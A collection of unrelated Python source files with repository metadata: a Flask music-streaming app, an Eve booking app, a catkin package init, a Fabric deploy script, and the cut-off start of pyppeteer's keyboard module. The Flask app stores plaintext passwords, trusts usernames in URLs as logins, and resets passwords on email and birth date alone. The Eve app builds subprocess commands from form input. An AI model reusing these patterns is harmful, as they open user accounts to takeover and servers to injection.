mes = db.Column(db.String(120), nullable=False)
date = db.Column(db.String(50), nullable=True)
class Users(db.Model):
uid = db.Column(db.Integer, primary_key=True)
fullname=db.Column(db.String(20), nullable=False)
email = db.Column(db.String(30), nullable=False)
username = db.Column(db.String(20), nullable=False)
password = db.Column(db.String(20), nullable=False)
gender = db.Column(db.String(10), nullable=False)
dob = db.Column(db.Date, nullable=False)
class Song_trivia(db.Model):
sid = db.Column(db.Integer, primary_key=True)
song_name=db.Column(db.String(30), nullable=False)
singers_name = db.Column(db.String(40), nullable=False)
music_director = db.Column(db.String(20), nullable=False)
lyricist = db.Column(db.String(20), nullable=False)
usersongs = {}
activeusers = {}
temp = []
adminsongs = []
adminsusers = {}
@app.route("/")
def home():
return render_template("main.html", params=params, username='')
@app.route("/reset/<string:username>", methods = ['GET', 'POST'])
def reset(username):
if request.method == 'POST':
password = request.form.get('password')
repassword = request.form.get('repassword')
if password != repassword:
return render_template("reset.html", username=username, params=params, message="Entered passwords does not match")
user = Users.query.filter_by(username=username).first()
user.password = password
session[username] = username
activeusers[username] = username
db.session.commit()
return redirect("/songs/"+username)
return render_template("reset.html", params=params, message="Reset your password", username=username)
@app.route("/forgotpass", methods =['GET', 'POST'])
def recover():
if request.method == 'POST':
username = request.form.get('username')
email = request.form.get('email')
dob = request.form.get('dob')
user = Users.query.filter_by(username=username).first()
if not user:
return render_template("recover.html", params=params, message="Username not found")
if (user.email == email) and (str(user.dob) == dob):
return redirect("/reset/"+username)
return render_template("recover.html", params=params, message="Provided Details doesnot match with the database")
return render_template("recover.html", params=params, message="Enter your details to reset the password")
@app.route("/songs/<string:username>")
def all(username):
if username in session and username in activeusers:
return render_template("userhome.html", params=params, username=username)
return redirect("/")
@app.route("/searchname/<string:username>/<int:page>", methods=['GET', 'POST'])
def searchname(username,page):
if username in session and username in activeusers:
if request.method == 'POST':
category = request.form.get('category')
keyword = request.form.get('keyword')
if category == "movie":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.movie_name.like(key)).all()
elif category == "song":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.song_name.like(key)).all()
elif category == "lyrics":
key = "%{0}%".format(keyword)
results = Songs.query.filter(Songs.song_lyrics.like(key)).all()
else:
key = "%{0}%".format(keyword)
list = []
details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key), Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
for detail in details:
list.append(int(detail[0]))
results = Songs.query.filter(Songs.sid.in_(list)).all()
temp.append(results)
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", check2="hiii", genre="Searched Songs", params=params, songs=results,prev=prev, next=next, username=username)
results = temp[len(temp)-1]
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(
params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", check2="hiii", genre="Searched Songs", params=params, songs=results,prev=prev, next=next, username=username)
return redirect("/")
@app.route("/songtrivia/<string:username>/<int:sid>")
def songtrivia(username,sid):
if username in session:
song = Songs.query.filter_by(sid=sid).first()
trivia = Song_trivia.query.filter_by(sid=sid).first()
return render_template("trivia.html", params=params, username=username, song=song, trivia=trivia)
return redirect("/")
@app.route("/list/<string:username>/others")
def otherlist(username):
if username in session and username in activeusers:
return render_template("userhomenext.html", params=params, username=username)
return redirect("/")
@app.route("/otherlist/<string:username>/<string:person>/<int:page>")
def otherlistsongs(username,person,page):
if username in session and username in activeusers:
list = []
key = "%{0}%".format(person)
details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key),Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
for detail in details:
list.append(int(detail[0]))
results = Songs.query.filter(Songs.sid.in_(list)).all()
if (len(results) <= int(params["no_of_posts"])):
prev = "1"
next = "1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(
params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
leng = len(usersongs[username])
return render_template("usersongs.html", check="hiii",params=params, genre=person, songs=results, prev=prev, next=next,username=username)
return redirect("/")
@app.route("/list/<string:username>/<string:genre>/<int:page>")
def songlist(username,genre,page):
if username in session and username in activeusers:
key = "%{0}%".format(genre)
results = Songs.query.filter(Songs.genre.like(key)).all()
if(len(results) <= int(params["no_of_posts"])):
prev="1"
next="1"
else:
last = math.ceil(len(results) / int(params["no_of_posts"]))
page = int(page)
results = results[(page - 1) * int(params["no_of_posts"]): (page - 1) * int(params["no_of_posts"]) + int(params["no_of_posts"])]
if (page == 1):
prev = last
next = str(page + 1)
elif (page == last):
prev = str(page - 1)
next = "1"
else:
prev = str(page - 1)
next = str(page + 1)
usersongs[username] = []
usersongs[username].append(results)
return render_template("usersongs.html", params=params, genre=genre, songs=results, prev=prev, next=next, username=username)
return redirect("/")
@app.route("/play/<string:username>/<string:sid>")
def play(username,sid):
if username in session and username in activeusers:
return render_template("player.html", index=sid, listlen=len(usersongs[username][0]), params=params, songs=usersongs[username][0], username=username)
return redirect("/")
@app.route("/registeruser", methods=['GET', 'POST'])
def register():
params["registermes"] = "enter your details for registration"
if request.method == 'POST':
fullname= request.form.get('fullname')
email = request.form.get('email')
username = request.form.get('username')
password = request.form.get('password')
gender = request.form.get('gender')
dob = request.form.get('dob')
repassword = request.form.get('repassword')
username = username.strip()
if Users.query.filter_by(username=username).first() or Admins.query.filter_by(admin_username=username).first():
params["registermes"] = "username already exists, try another username"
return render_template("register.html", params=params)
elif Users.query.filter_by(email=email).first() or Admins.query.filter_by(admin_email=email).first():
params["registermes"] = "email already registered, try another email"
return render_template("register.html", params=params)
elif password!=repassword:
params["registermes"] = "entered passwords doesn't match, kindly recheck"
return render_template("register.html", params=params)
else:
user = Users(fullname=fullname, email=email, username=username, password=password, gender=gender, dob=dob)
db.session.add(user)
db.session.commit()
session[username] = username
activeusers[username] = username
params["registermes"] = "Succesfully registered"
return redirect('/songs/' + username)
return render_template("register.html", params=params)
@app.route("/user", methods=['GET', 'POST'])
def user():
params["mes"] = "enter your details for login"
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
username=username.strip()
if '@' in username and '.com' in username:
if not Users.query.filter_by(email=username).first():
params["mes"] = "account not found"
render_template("userform.html", params=params)
elif not Users.query.filter_by(email=username, password=password).first():
params["mes"] = "username and password doesnt match"
render_template("userform.html", params=params)
else:
details=Users.query.with_entities(Users.username).filter(Users.email==username).all()
username=details[0][0]
session[username] = username
activeusers[username] = username
return redirect('/songs/' + username)
else:
if not Users.query.filter_by(username=username).first():
params["mes"] = "account not found"
render_template("userform.html", params=params)
elif not Users.query.filter_by(username=username, password=password).first():
params["mes"] = "username and password doesnt match"
render_template("userform.html", params=params)
else:
session[username] = username
activeusers[username] = username
return redirect('/songs/' + username)
return render_template("userform.html", params=params)
@app.route("/logout/<string:username>")
def logout(username):
if username in session and username in activeusers:
session.pop(username)
activeusers.pop(username)
return redirect("/")
return redirect("/")
@app.route("/deactivate/<string:username>")
def deactivate(username):
if username in session and username in activeusers:
user = Users.query.filter_by(username=username).first()
session.pop(username)
activeusers.pop(username)
db.session.delete(user)
db.session.commit()
return redirect("/")
return redirect("/")
@app.route("/password/<string:username>")
def password(username):
if username in session and username in activeusers:
return render_template("password.html", params=params, username=username, message="Enter the details")
return redirect("/")
@app.route("/profile/<string:username>")
def profile(username):
if username in session and username in activeusers:
user = Users.query.filter_by(username=username).first()
return render_template("profile.html", params=params, username=username, user=user)
return redirect("/")
@app.route("/changepass/<string:username>", methods=['GET', 'POST'])
def changepass(username):
if username in session and username in activeusers:
currentpassword=request.form.get('currentpassword')
newpassword = request.form.get('newpassword')
renewpassword = request.form.get('renewpassword')
if Users.query.filter_by(username=username, password=currentpassword).first():
if newpassword==renewpassword:
user = Users.query.filter_by(username=username).first()
user.password = renewpassword
db.session.commit()
return render_template("password.html", params=params, username=username, message="Password succesfully changed")
return render_template("password.html", params=params, username=username, message="Entered New Password does not match with confirm new password, please recorrect")
return render_template("password.html", params=params, username=username, message="Current password does not with the password in our database")
return redirect("/")
@app.route("/delete/<string:adminname>/<string:sid>", methods=['GET', 'POST'])
def delete(adminname,sid):
if (adminname in session and adminname in adminsusers):
song = Songs.query.filter_by(sid=sid).first()
db.session.delete(song)
db.session.commit()
return redirect("/songdetails/"+adminname)
return redirect("/")
@app.route("/adminlogin", methods=['GET', 'POST'])
def adminlogin():
if request.method == 'POST':
params["registermes"] = "enter your details for login"
adminname = request.form.get('adminname')
password = request.form.get('admin_password')
if '@' in adminname and '.com' in adminname:
if not Admins.query.filter_by(admin_email=adminname).first():
params["mes"] = "account not found"
render_template("adminlogin.html", params=params)
elif not Admins.query.filter_by(admin_email=adminname, admin_password=password).first():
params["mes"] = "username and password does not match"
render_template("adminlogin.html", params=params)
else:
details = Admins.query.with_entities(Admins.admin_username).filter(Admins.admin_email == adminname).all()
adminname = details[0][0]
session[adminname] = adminname
adminsusers[adminname] = adminname
return redirect('/dashboard/' + adminname)
else:
if not Admins.query.filter_by(admin_username=adminname).first():
params["mes"] = "account not found"
render_template("adminlogin.html", params=params)
elif not Admins.query.filter_by(admin_username=adminname, admin_password=password).first():
params["mes"] = "username and password does not match"
render_template("adminlogin.html", params=params)
else:
session[adminname] = adminname
adminsusers[adminname] = adminname
return redirect('/dashboard/' + adminname)
return render_template("adminlogin.html", params=params)
@app.route("/adminpassword/<string:adminname>", methods=['GET', 'POST'])
def adminpass(adminname):
if adminname in session and adminname in adminsusers:
if request.method == "POST":
currentpassword=request.form.get('currentpassword')
newpassword = request.form.get('newpassword')
renewpassword = request.form.get('renewpassword')
if Admins.query.filter_by(admin_username=adminname, admin_password=currentpassword).first():
if newpassword==renewpassword:
admin = Admins.query.filter_by(admin_username=adminname).first()
admin.admin_password = renewpassword
db.session.commit()
return render_template("adminpassword.html", params=params, adminname=adminname, message="Password succesfully changed")
return render_template("adminpassword.html", params=params, adminname=adminname, message="Entered New Password does not match with confirm new password, please recorrect")
return render_template("adminpassword.html", params=params, adminname=adminname, message="Current password does not with the password in our database")
return render_template("adminpassword.html", params=params, adminname=adminname, message="enter the details")
return redirect("/adminlogin")
@app.route("/dashboard/<string:adminname>", methods=['GET', 'POST'])
def dashboard(adminname):
if (adminname in session and adminname in adminsusers):
adminsongs = Songs.query.all()
adminusers = Users.query.all()
adminmessages = Contact.query.all()
admindetails = Admins.query.all()
return render_template("dashboard.html",adminscount = len(admindetails), userscount=len(adminusers), activeusers=len(activeusers), totalsongs=len(adminsongs), messagescount=len(adminmessages), params=params, adminname=adminname)
return render_template("adminlogin.html", params=params)
@app.route("/userdetails/<string:adminname>")
def userdetails(adminname):
if (adminname in session and adminname in adminsusers):
list = []
for acuser in activeusers:
print(acuser)
list.append(acuser)
print(list)
results = Users.query.filter(Users.username.in_(list)).all()
print(results)
adminusers = Users.query.all()
return render_template("userdetails.html", adminname=adminname, acusers=results, users=adminusers, params=params)
return redirect("/adminlogin")
@app.route("/songdetails/<string:adminname>", methods=["GET","POST"])
def songdetails(adminname):
if (adminname in session and adminname in adminsusers):
if request.method == 'POST':
category = request.form.get('category')
keyword = request.form.get('keyword')
if category == "movie":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.movie_name.like(key)).all()
elif category == "song":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.song_name.like(key)).all()
elif category == "lyrics":
key = "%{0}%".format(keyword)
adminsongs = Songs.query.filter(Songs.song_lyrics.like(key)).all()
else:
key = "%{0}%".format(keyword)
details = Song_trivia.query.with_entities(Song_trivia.sid).filter(or_(Song_trivia.singers_name.like(key), Song_trivia.music_director.like(key),Song_trivia.lyricist.like(key))).all()
for detail in details:
list.append(int(detail[0]))
adminsongs = Songs.query.filter(Songs.sid.in_(list)).all()
return render_template("songdetails.html", adminname=adminname, songs=adminsongs, params=params)
adminsongs = Songs.query.all()
return render_template("songdetails.html", adminname=adminname, songs=adminsongs, params=params)
return redirect("/adminlogin")
@app.route("/usermessages/<string:adminname>")
def messagedetails(adminname):
if (adminname in session and adminname in adminsusers):
adminmessages = Contact.query.all()
return render_template("usermessages.html", adminname=adminname, users=adminmessages , params=params)
return redirect("/adminlogin")
@app.route("/admindetails/<string:adminname>")
def admindetails(adminname):
if (adminname in session and adminname in adminsusers):
admins = Admins.query.all()
return render_template("admindetails.html", admins=admins, adminname=adminname, params=params)
return redirect("/adminlogin")
@app.route("/addadmin/<string:adminname>", methods=['GET', 'POST'])
def addadmin(adminname):
if(adminname in session and adminname in adminsusers):
if(adminname==params["mainadmin"]):
params["registermes"] = "enter the admin details"
if request.method == 'POST':
fullname = request.form.get('fullname')
email = request.form.get('email')
username = request.form.get('username')
password = request.form.get('password')
gender = request.form.get('gender')
dob = request.form.get('dob')
repassword = request.form.get('repassword')
if Users.query.filter_by(username=username).first() or Admins.query.filter_by(admin_username=username).first():
params["registermes"] = "username already exists, try another username"
return render_template("addadmin.html", adminname=adminname, params=params)
elif Users.query.filter_by(email=email).first() or Admins.query.filter_by(admin_email=email).first():
params["registermes"] = "email already registered, try another email"
return render_template("addadmin.html", adminname=adminname, params=params)
elif password != repassword:
params["registermes"] = "entered passwords doesn't match, kindly recheck"
return render_template("addadmin.html", adminname=adminname, params=params)
else:
admin = Admins(admin_fullname=fullname, admin_email=email, admin_username=username, admin_password=password, admin_gender=gender, admin_dob=dob)
db.session.add(admin)
db.session.commit()
params["registermes"] = "Succesfully added"
return redirect('/dashboard/' + adminname)
return render_template("addadmin.html", adminname=adminname, params=params)
return redirect("/dashboard/"+adminname)
return redirect("/adminlogin")
@app.route("/userdelete/<string:adminname>/<string:uid>", methods=['GET', 'POST'])
def deleteuser(adminname,uid):
if (adminname in session and adminname in adminsusers):
user = Users.query.filter_by(uid=uid).first()
db.session.delete(user)
db.session.commit()
return redirect("/userdetails/"+adminname)
return redirect("/adminlogin")
@app.route("/admindelete/<string:adminname>/<string:no>", methods=['GET', 'POST'])
def deleteadmin(adminname,no):
if (adminname in session and adminname in adminsusers):
if (adminname==params["mainadmin"]):
admin = Admins.query.filter_by(admin_no=no).first()
db.session.delete(admin)
db.session.commit()
return redirect("/admindetails/"+adminname)
return redirect("/adminlogin")
@app.route("/messagedelete/<string:adminname>/<string:sno>", methods=['GET', 'POST'])
def deletemessage(adminname,sno):
if (adminname in session and adminname in adminsusers):
message = Contact.query.filter_by(sno=sno).first()
db.session.delete(message)
db.session.commit()
return redirect("/usermessages/"+adminname)
return redirect("/adminlogin")
@app.route("/add/<string:adminname>", methods=['GET', 'POST'])
def add(adminname):
if adminname in session and adminname in adminsusers:
if request.method == 'POST':
f = request.files['file']
f2 = request.files['file2']
song_name = request.form.get('song_name')
movie_name = request.form.get('movie_name')
slug = request.form.get('slug')
song_location = f.filename
image_location = f2.filename
lyrics = request.form.get('lyrics')
genre = request.form.get('genre')
singers = request.form.get('singers')
director = request.form.get('director')
lyricist = request.form.get('lyricist')
if f.filename != '':
f.save(os.path.join(app.config['song_folder'], secure_filename(f.filename)))
if f2.filename != '':
f2.save(os.path.join(app.config['image_folder'], secure_filename(f2.filename)))
song = Songs(song_name=song_name, genre=genre, slug=slug, movie_name=movie_name, song_location=song_location, image_location=image_location, song_lyrics=lyrics)
db.session.add(song)
db.session.commit()
details = Songs.query.with_entities(Songs.sid).filter(Songs.song_name == song_name).all()
sid=details[0][0]
trivia = Song_trivia(sid=sid, song_name = song_name, singers_name = singers, music_director = director, lyricist = lyricist)
db.session.add(trivia)
db.session.commit()
return render_template("add.html", adminname=adminname, params=params)
return redirect("/adminlogin")
@app.route("/uploadsong/<string:adminname>")
def upload(adminname):
if (adminname in session):
return render_template("upload.html", adminname=adminname, params=params)
@app.route("/uploader/<string:adminname>", methods=['GET', 'POST'])
def uploader(adminname):
if (adminname in session):
if request.method == 'POST':
f = request.files['file']
if f.filename != '':
f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename) ))
return render_template("upload.html", adminname=adminname, params=params)
@app.route("/edit/<string:adminname>/<string:sid>", methods=['GET', 'POST'])
def edit(adminname,sid):
if adminname in session and adminname in adminsusers:
if request.method == 'POST':
song_name = request.form.get('song_name')
movie_name = request.form.get('movie_name')
slug = request.form.get('slug')
song_location = request.form.get('song_location')
genre = request.form.get('genre')
image_location = request.form.get('image_location')
singers = request.form.get('singers')
director = request.form.get('director')
lyricist = request.form.get('lyricist')
trivia = Song_trivia.query.filter_by(sid=sid).first()
trivia.singers_name = singers
trivia.music_director = director
trivia.lyricist = lyricist
db.session.commit()
song = Songs.query.filter_by(sid=sid).first()
song.song_name = song_name
song.slug = slug
song.genre=genre
song.movie_name = movie_name
song.song_location = song_location
song.image_location = image_location
db.session.commit()
return redirect('/edit/' + adminname + "/" + sid)
song = Songs.query.filter_by(sid=sid).first()
trivia = Song_trivia.query.filter_by(sid=sid).first()
return render_template("edit.html", adminname=adminname, trivia=trivia, params=params, song=song)
return redirect("/adminlogin")
@app.route("/about/")
def about():
return render_template("about.html", params=params, username='')
@app.route("/about/<string:username>")
def aboutifuserin(username):
if username in session and username in activeusers:
return render_template("about.html", params=params, username=username)
return redirect("/about/")
@app.route("/adminlogout/<string:adminname>")
def adminlogout(adminname):
if adminname in session and adminname in adminsusers:
session.pop(adminname)
adminsusers.pop(adminname)
return redirect("/")
return redirect("/adminlogin")
@app.route("/contact/", methods=['GET', 'POST'])
def contact():
if request.method == 'POST':
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
message = request.form.get('message')
entry = Contact(name=name, phone_num=phone, mes=message, date=datetime.now(), email=email)
db.session.add(entry)
db.session.commit()
mail.send_message("New message from " + name,
sender=email,
recipients=[params["gmail_username"]],
body=message + "\n" + phone + "\n" + email
)
return render_template("contact.html", params=params, username='')
@app.route("/contact/<string:username>", methods=['GET', 'POST'])
def contactifuserin(username):
if username in session and username in activeusers:
if request.method == 'POST':
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
message = request.form.get('message')
entry = Contact(name=name, phone_num=phone, mes=message, date=datetime.now(), email=email)
db.session.add(entry)
db.session.commit()
mail.send_message("New message from " + name,
sender=email,
recipients=[params["gmail_username"]],
body=message + "\n" + phone + "\n" +email
)
return render_template("contact.html", params=params, username=username)
return redirect("/contact/")
app.run(debug=True)
|
[
"chikkiyeshwanth@gmail.com"
] |
chikkiyeshwanth@gmail.com
|
f2522ec63de771ae827c9c98f5d1a4d6a50018d2
|
65c81234539ce28ce16bc922b866bdc33b5577af
|
/4kurs/prog/Проект/eve-main/run.py
|
d8746712309b9b5e2b70cf702bf8050db9aa62b8
|
[] |
no_license
|
Serega89Kh/Serega89Kh.github.io
|
7c5ccf73b92540714ae91a38397cca042caa4207
|
1a930146111f4a38494a92bc40f04f2850e5d5fe
|
refs/heads/master
| 2021-06-25T17:36:34.002657
| 2021-06-12T20:39:20
| 2021-06-12T20:39:20
| 148,633,512
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,685
|
py
|
from eve import Eve
from flask import Flask, render_template, request, redirect
import subprocess
name_id = {}
planned = []
inprogress = []
def create_id(resource,items):
item = items[0]
first = item.get('firstname')
last = item.get('lastname')
id = str(item.get('_id'))
if resource == 'Planned':
name_id[first+last] = id
if resource == 'Inprogress':
name_id[first+last+'1'] = id
pass
def create_guest(collections,first,last):
subprocess.check_output('http http://127.0.0.1:5000/'+collections+' firstname='+first+' lastname='+last)
print('Создан гость в '+collections+' Имя='+first+' Фамилия='+last)
def delete_guest(collections,id):
subprocess.check_output('http delete http://127.0.0.1:5000/'+collections+'/'+id)
print('Удален гость в '+collections+' ID='+id)
def update_guest(collections,id,first,last):
subprocess.check_output('http put http://127.0.0.1:5000/'+collections+'/'+id+' firstname='+first+' lastname='+last)
print('Изменен гость в '+collections+' Имя='+first+' Фамилия='+last)
app = Eve(__name__)
@app.route('/book', methods=['POST', 'GET'])
def index():
print(name_id)
return render_template("index.html", planned=planned, inprogress=inprogress)
@app.route('/add', methods=['POST'])
def add():
a = request.form["collection"]
b = request.form["firstname"]
c = request.form["lastname"]
create_guest(a,b,c)
if a == 'Planned':
planned.append(b+' '+c)
if a == 'Inprogress':
inprogress.append(b+' '+c)
return redirect("/book", code=302)
@app.route('/update', methods=['POST'])
def update():
a = request.form["collection1"]
b = request.form["firstname1"]
c = request.form["lastname1"]
d = request.form["collection2"]
e = request.form["firstname2"]
f = request.form["lastname2"]
if a == d:
if d == 'Planned':
planned.remove(b+' '+c)
planned.append(e+' '+f)
g = name_id.get(b+c)
update_guest(d,g,e,f)
name_id.pop(b+c)
name_id[e+f] = g
if d == 'Inprogress':
inprogress.remove(b+' '+c)
inprogress.append(e+' '+f)
g = name_id.get(b+c+'1')
update_guest(d,g,e,f)
name_id.pop(b+c+'1')
name_id[e+f+'1'] = g
if a != d:
if d == 'Planned':
planned.append(e+' '+f)
g = name_id.get(b+c+'1')
update_guest(d,g,e,f)
name_id[e+f] = g
if d == 'Inprogress':
inprogress.append(e+' '+f)
g = name_id.get(b+c)
update_guest(d,g,e,f)
name_id[e+f+'1'] = g
return redirect("/book", code=302)
@app.route('/del', methods=['POST'])
def delete():
a = request.form["collection3"]
b = request.form["firstname3"]
c = request.form["lastname3"]
if a == 'Planned':
planned.remove(b+' '+c)
d = name_id.get(b+c)
delete_guest(a,d)
name_id.pop(b+c)
if a == 'Inprogress':
inprogress.remove(b+' '+c)
d = name_id.get(b+c+'1')
delete_guest(a,d)
name_id.pop(b+c+'1')
return redirect("/book", code=302)
@app.route('/delete_all', methods=['POST'])
def delete_all():
subprocess.check_output('http delete http://127.0.0.1:5000/Planned')
subprocess.check_output('http delete http://127.0.0.1:5000/Inprogress')
return redirect("/book", code=302)
if __name__ == '__main__':
app.on_inserted += create_id
app.run()
|
[
"noreply@github.com"
] |
Serega89Kh.noreply@github.com
|
9566f13caef2578de4f77597644c40f62124c7c5
|
a3b2c7069c9fab8632b0568db5ab79aceacf9c9c
|
/devel/lib/python2.7/dist-packages/rqt_shell/__init__.py
|
f1db1c731717b00d1205fdcdaf8f8c96af98c62c
|
[] |
no_license
|
tbake0155/bluedragon_workspace
|
08ed85d9de29c178704bd3f883acafae473b175e
|
384d863e00689cf40cde4933447210bbb1ba8636
|
refs/heads/master
| 2021-05-12T01:35:45.896266
| 2018-01-15T14:59:39
| 2018-01-15T14:59:39
| 117,558,143
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,038
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/tim/catkin_ws/src/rqt_common_plugins/rqt_shell/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"tbake0155@gmail.com"
] |
tbake0155@gmail.com
|
7de9d2e9c1df80fc40ceb8a1bc81a639a522eb5d
|
90e39e45d469bb5dd9cb36805a88c97f41c147de
|
/3-deploy_web_static.py
|
5b1b40b59f0b93f01a9093e1b1ba1100524e7afe
|
[] |
no_license
|
Noeuclides/AirBnB_clone_v2
|
372b3d01ba76d41a79dca166d6ca7d471749a07d
|
13fac5127af0149e7bef9a94b70e6d2746eeb4fd
|
refs/heads/master
| 2020-07-03T19:16:10.404783
| 2019-09-11T00:42:29
| 2019-09-11T00:42:29
| 202,020,044
| 0
| 2
| null | 2019-08-19T03:08:39
| 2019-08-12T22:44:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/python3
from datetime import datetime
from fabric.api import *
from os import path
'''automatize with fabric
'''
'''env.user = 'localhost'
'''
env.hosts = ['35.231.53.89', '35.190.176.186']
def do_pack():
'''making a pack on web_static folder
'''
now = datetime.now()
file = 'web_static_' + now.strftime("%Y%m%d%H%M%S") + '.' + 'tgz'
local("mkdir -p versions")
check = local("tar -cvzf versions/{file} web_static".format(file=file))
if check is not None:
return file
else:
return None
def do_deploy(archive_path):
'''distribute an archive to web servers
'''
print(archive_path)
print(str(path.exists(archive_path)))
if str(path.exists(archive_path)) is False:
return False
oper = []
file = archive_path.split("/")
oper.append(put(archive_path, '/tmp'))
folder = file[1].split('.')
print(folder[0])
oper.append(
run("mkdir -p /data/web_static/releases/{folder}".format(
folder=folder[0])))
oper.append(run(
"tar -xzf /tmp/{file} .C /data/web_static/releases/{folder}/".format(
file=file[1], folder=folder[0])))
oper.append(run("rm /tmp/{file}".format(file=file[1])))
oper.append(run("mv /data/web_static/releases/{folder}/web_static/* /data/web_static/releases/{folder}".format(
folder=folder[0])))
oper.append(run(
"rm -rf /data/web_static/releases/{folder}/web_static".format(
folder=folder[0])))
oper.append(run("rm -rf /data/web_static/current"))
oper.append(run(
"ln -s /data/web_static/releases/{folder}/ /data/web_static/current".format(
folder=folder[0])))
print(oper)
for op in oper:
if op is False:
return False
return True
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
41b805521cf145dafcff051be669ec825cf821ec
|
19926f1b5672465d1454d225ea937056115f5828
|
/bot/utils/HTML_photo/pyppeteer/pyppeteer/input.py
|
0659c5efde5ea78799d0c78808f6506c4f8c0df9
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
askador/Homework-Scheduler
|
ff974239417ff07599f8170de29e897fd769850b
|
985df5840b5abbb30ce9da381f8d5406e2b3a1f2
|
refs/heads/main
| 2023-06-02T21:33:55.283968
| 2021-06-23T12:09:53
| 2021-06-23T12:09:53
| 379,587,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,122
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Keyboard and Mouse module."""
import asyncio
from typing import Any, Dict, TYPE_CHECKING
from bot.utils.HTML_photo.pyppeteer.pyppeteer.connection import CDPSession
from bot.utils.HTML_photo.pyppeteer.pyppeteer.errors import PyppeteerError
from bot.utils.HTML_photo.pyppeteer.pyppeteer.us_keyboard_layout import keyDefinitions
from bot.utils.HTML_photo.pyppeteer.pyppeteer.util import merge_dict
if TYPE_CHECKING:
from typing import Set # noqa: F401
class Keyboard(object):
"""Keyboard class provides as api for managing a virtual keyboard.
The high level api is :meth:`type`, which takes raw characters and
generate proper keydown, keypress/input, and keyup events on your page.
For finer control, you can use :meth:`down`, :meth:`up`, and
:meth:`sendCharacter` to manually fire events as if they were generated
from a real keyboard.
An example of holding down ``Shift`` in order to select and delete some
text:
.. code::
await page.keyboard.type('Hello, World!')
await page.keyboard.press('ArrowLeft')
await page.keyboard.down('Shift')
for i in ' World':
await page.keyboard.press('ArrowLeft')
await page.keyboard.up('Shift')
await page.keyboard.press('Backspace')
# Result text will end up saying 'Hello!'.
An example of pressing ``A``:
.. code::
await page.keyboard.down('Shift')
await page.keyboard.press('KeyA')
await page.keyboard.up('Shift')
"""
def __init__(self, client: CDPSession) -> None:
self._client = client
self._modifiers = 0
self._pressedKeys: Set[str] = set()
async def down(self, key: str, options: dict = None, **kwargs: Any
) -> None:
"""Dispatch a ``keydown`` event with ``key``.
If ``key`` is a single character and no modifier keys besides ``Shift``
are being held down, and a ``keypress``/``input`` event will also
generated. The ``text`` option can be specified to force an ``input``
event to be generated.
If ``key`` is a modifier key, like ``Shift``, ``Meta``, or ``Alt``,
subsequent key presses will be sent with that modifier active. To
release the modifier key, use :meth:`up` method.
:arg str key: Name of key to press, such as ``ArrowLeft``.
:arg dict options: Option can have ``text`` field, and if this option
specified, generate an input event with this text.
.. note::
Modifier keys DO influence :meth:`down`. Holding down ``shift``
will type the text in upper case.
"""
options = merge_dict(options, kwargs)
description = self._keyDescriptionForString(key)
autoRepeat = description['code'] in self._pressedKeys
self._pressedKeys.add(description['code'])
self._modifiers |= self._modifierBit(description['key'])
text = options.get('text')
if text is None:
text = description['text']
await self._client.send('Input.dispatchKeyEvent', {
'type': 'keyDown' if text else 'rawKeyDown',
'modifiers': self._modifiers,
'windowsVirtualKeyCode': description['keyCode'],
'code': description['code'],
'key': description['key'],
'text': text,
'unmodifiedText': text,
'autoRepeat': autoRepeat,
'location': description['location'],
'isKeypad': description['location'] == 3,
})
def _modifierBit(self, key: str) -> int:
if key == 'Alt':
return 1
if key == 'Control':
return 2
